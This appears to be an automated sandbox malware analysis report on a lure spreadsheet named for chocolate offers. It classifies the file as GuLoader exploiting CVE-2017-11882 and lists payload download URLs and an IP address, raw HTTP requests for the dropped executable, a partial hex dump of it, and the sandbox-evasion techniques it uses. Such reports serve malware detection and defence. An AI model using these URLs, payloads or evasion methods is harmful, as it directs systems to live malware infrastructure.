Windows Analysis Report MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx

Overview

General Information

Sample Name: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx
Analysis ID: 452495
MD5: b7cdda847140697b7bb7866b06d2a225
SHA1: 874d1157c6e65813383c6b4bffd4d48948993c88
SHA256: 1e7447cb7adb3336fcf6d2837781a2ab0d9f9fd3060cde3a47293bd34a883cdb
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://180.214.239.39/process/.svchost.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 42%

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Interrup.pdb source: .svchost[1].exe.4.dr

Software Vulnerabilities:

barindex
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 180.214.239.39:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 180.214.239.39:80

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Jul 2021 11:50:59 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Wed, 21 Jul 2021 22:37:17 GMTETag: "3c468-5c7a9d0090119"Accept-Ranges: bytesContent-Length: 246888Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 b6 5c 53 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 03 00 00 70 00 00 00 00 00 00 30 13 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 b0 03 00 00 10 00 00 19 f9 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 30 03 00 28 00 00 00 00 50 03 00 c4 54 00 00 00 00 00 00 00 00 00 00 58 b0 03 00 10 14 00 00 00 00 00 00 00 00 00 00 00 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 24 03 00 00 10 00 00 00 30 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 90 0b 00 00 00 40 03 00 00 10 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c4 54 00 00 00 50 03 00 00 60 00 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 180.214.239.39 180.214.239.39
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /process/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F70A7842.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /process/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
Source: .svchost[1].exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: F70A7842.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

barindex
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe Jump to dropped file
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E543B NtAllocateVirtualMemory, 6_2_002E543B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E5540 NtAllocateVirtualMemory, 6_2_002E5540
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E543B 6_2_002E543B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E2C2A 6_2_002E2C2A
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E8C36 6_2_002E8C36
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E841E 6_2_002E841E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E4860 6_2_002E4860
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7077 6_2_002E7077
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E0C4C 6_2_002E0C4C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E8C42 6_2_002E8C42
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E0C54 6_2_002E0C54
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E2455 6_2_002E2455
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E80A4 6_2_002E80A4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E28A0 6_2_002E28A0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E048D 6_2_002E048D
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E0889 6_2_002E0889
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E80EF 6_2_002E80EF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E48E9 6_2_002E48E9
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E80C6 6_2_002E80C6
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E0CC3 6_2_002E0CC3
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E38D1 6_2_002E38D1
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E3D2C 6_2_002E3D2C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7D3E 6_2_002E7D3E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E5908 6_2_002E5908
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7D06 6_2_002E7D06
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E4105 6_2_002E4105
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E2518 6_2_002E2518
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E0916 6_2_002E0916
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E4912 6_2_002E4912
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E517E 6_2_002E517E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E0147 6_2_002E0147
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E5D43 6_2_002E5D43
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E15BD 6_2_002E15BD
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E05B1 6_2_002E05B1
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E3D84 6_2_002E3D84
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E322C 6_2_002E322C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E2228 6_2_002E2228
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E1A21 6_2_002E1A21
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E163B 6_2_002E163B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E421B 6_2_002E421B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E3A18 6_2_002E3A18
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E3A69 6_2_002E3A69
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E1A78 6_2_002E1A78
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E3259 6_2_002E3259
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E3684 6_2_002E3684
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E42C0 6_2_002E42C0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E3ED8 6_2_002E3ED8
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E832E 6_2_002E832E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E3325 6_2_002E3325
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E6B35 6_2_002E6B35
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E770F 6_2_002E770F
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E4712 6_2_002E4712
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E6B7B 6_2_002E6B7B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E2379 6_2_002E2379
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7F4E 6_2_002E7F4E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E475F 6_2_002E475F
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E6FAF 6_2_002E6FAF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E27A4 6_2_002E27A4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7BA4 6_2_002E7BA4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E47A2 6_2_002E47A2
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E87BC 6_2_002E87BC
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E23FF 6_2_002E23FF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E47C8 6_2_002E47C8
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E0BDC 6_2_002E0BDC
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/13@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR164D.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx Static file information: File size 1267200 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Interrup.pdb source: .svchost[1].exe.4.dr
Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx Initial sample: OLE indicators vbamacros = False
Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_002212F5 push edx; ret 6_2_00221321
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221023 push edx; ret 6_2_00221051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222823 push edx; ret 6_2_00222851
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224023 push edx; ret 6_2_00224051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00227024 push edx; ret 6_2_00227051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225825 push edx; ret 6_2_00225851
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224833 push edx; ret 6_2_00224861
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223033 push edx; ret 6_2_00223061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221833 push edx; ret 6_2_00221861
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226034 push edx; ret 6_2_00226061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220038 push edx; ret 6_2_00220061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224803 push edx; ret 6_2_00224831
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223003 push edx; ret 6_2_00223031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221803 push edx; ret 6_2_00221831
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226004 push edx; ret 6_2_00226031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220008 push edx; ret 6_2_00220031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223813 push edx; ret 6_2_00223841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225013 push edx; ret 6_2_00225041
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222014 push edx; ret 6_2_00222041
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226814 push edx; ret 6_2_00226841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220818 push edx; ret 6_2_00220841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223063 push edx; ret 6_2_00223091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221863 push edx; ret 6_2_00221891
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224863 push edx; ret 6_2_00224891
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226065 push edx; ret 6_2_00226091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220068 push edx; ret 6_2_00220091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222074 push edx; ret 6_2_002220A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223874 push edx; ret 6_2_002238A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225074 push edx; ret 6_2_002250A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226875 push edx; ret 6_2_002268A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220878 push edx; ret 6_2_002208A1

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
